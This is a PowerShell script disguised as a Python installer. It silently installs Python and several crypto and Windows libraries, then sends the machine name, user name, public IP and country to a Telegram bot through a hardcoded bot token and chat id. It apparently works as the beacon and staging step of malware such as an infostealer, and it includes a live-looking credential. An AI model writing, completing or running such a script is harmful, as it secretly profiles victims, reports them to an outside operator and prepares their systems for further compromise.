$logFile = "$env:LOCALAPPDATA\pip_log.txt"
"=== [Start Install - $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')] ===" | Out-File $logFile -Encoding UTF8

function Check-Python {
    try {
        $v = & python --version 2>&1
        if ($v -match "Python\s+3\.") { return $true }
    } catch {}
    return $false
}

$hadPython = Check-Python

if (-not $hadPython) {
    "`n[+] Downloading Python 3.13..." | Out-File $logFile -Append
    $inst = "$env:TEMP\py_installer.exe"
    try {
        Invoke-WebRequest "https://www.python.org/ftp/python/3.13.0/python-3.13.0-amd64.exe" -OutFile $inst
        "`n[+] Installing Python..." | Out-File $logFile -Append
        Start-Process $inst -ArgumentList "/quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_doc=0" -Wait
        Remove-Item $inst
        $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")
    } catch {
        "`n[!] Download/Install failed: $_" | Out-File $logFile -Append
    }
}

if (Check-Python) {
    "`n[✓] Python is ready." | Out-File $logFile -Append
    try {
        & python -m ensurepip --default-pip 2>&1 | Out-File $logFile -Append
        & python -m pip install --upgrade pip 2>&1 | Out-File $logFile -Append

        $libs = "requests", "websocket-client", "pyasn1", "pycryptodome", "pypiwin32"
        foreach ($lib in $libs) {
            "`n[+] Installing $lib..." | Out-File $logFile -Append
            & python -m pip install $lib --quiet 2>&1 | Out-File $logFile -Append
        }
        "`n[✓] All libraries installed." | Out-File $logFile -Append
    } catch {
        "`n[!] Error during pip operations: $_" | Out-File $logFile -Append
    }
} else {
    "`n[✗] Python installation could not be verified." | Out-File $logFile -Append
}

$token = "8153825828:AAE-Z7EZqi3_gmWCS11o-PNTPgoNkqG-U5U"
$chat = "1773070934"

try {
    $ipInfo = Invoke-RestMethod "http://ip-api.com/json/"
    $msg = "[PythonSetup]`nMachine: $env:COMPUTERNAME`nUser: $env:USERNAME`nIP: $($ipInfo.query)`nLoc: $($ipInfo.country)`nPython: $(if ($hadPython) {'Already'} else {'New'})"
    Invoke-RestMethod "https://api.telegram.org/bot$token/sendMessage" -Method Post -Body @{ chat_id = $chat; text = $msg }
} catch {}

"--- [End - $(Get-Date)] ---" | Out-File $logFile -Append
